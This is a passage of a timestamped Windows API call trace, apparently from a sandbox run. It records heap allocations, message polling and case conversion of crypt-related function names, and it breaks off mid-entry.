[0117.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0117.361] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0117.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0117.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0117.362] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0117.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0117.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0117.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2890 [0117.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0117.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0117.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0117.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x65cf) returned 0x4516010 [0117.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2800 [0117.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0117.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2740 [0117.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0117.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0117.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28f0 [0117.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0117.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0117.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac88 [0117.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0117.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0117.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0117.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0117.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0117.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x65cf) returned 0x4522bc0 [0117.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0117.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0117.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0117.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0117.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0117.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0117.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0117.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0117.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0117.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0117.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0117.364] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0117.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0117.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0117.364] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0117.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0117.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0117.364] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0117.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0117.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0117.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27a0 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0117.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab68 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0508 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0117.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03a0 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0117.365] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0418 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0117.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d04b8 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0117.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0117.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0117.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0117.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0117.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0117.366] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0117.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0117.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0117.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0117.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0117.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0117.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0117.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0117.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0117.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0117.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0117.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0117.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0117.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0117.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0117.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0117.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0117.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0117.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0117.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0117.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d04b8 | out: hHeap=0x1780000) returned 1 [0117.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.367] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0117.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0468 [0117.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0117.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0117.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0117.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0117.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0117.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0117.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03f0 [0117.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0117.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0117.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0117.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0117.367] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0117.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0117.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caad8 [0117.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0117.367] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0117.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0117.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0117.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0117.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0117.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0117.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0117.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0117.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0117.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0117.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0117.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0117.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0117.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0117.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0117.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0117.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0117.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03f0 | out: hHeap=0x1780000) returned 1 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0117.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0117.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0530 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0117.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0117.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0117.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0117.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0117.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0117.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0117.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0117.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0530 | out: hHeap=0x1780000) returned 1 [0117.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0117.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0117.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0117.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0117.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0117.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0117.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0117.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0117.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0117.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0117.370] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0117.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0117.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0117.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0117.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0117.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0117.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0117.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0117.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03c8 [0117.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0117.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0117.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0117.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0117.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0117.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0117.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0117.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0117.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0117.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0117.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0117.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0117.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0117.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0117.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0117.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0117.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0117.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0117.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0117.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0117.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0117.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 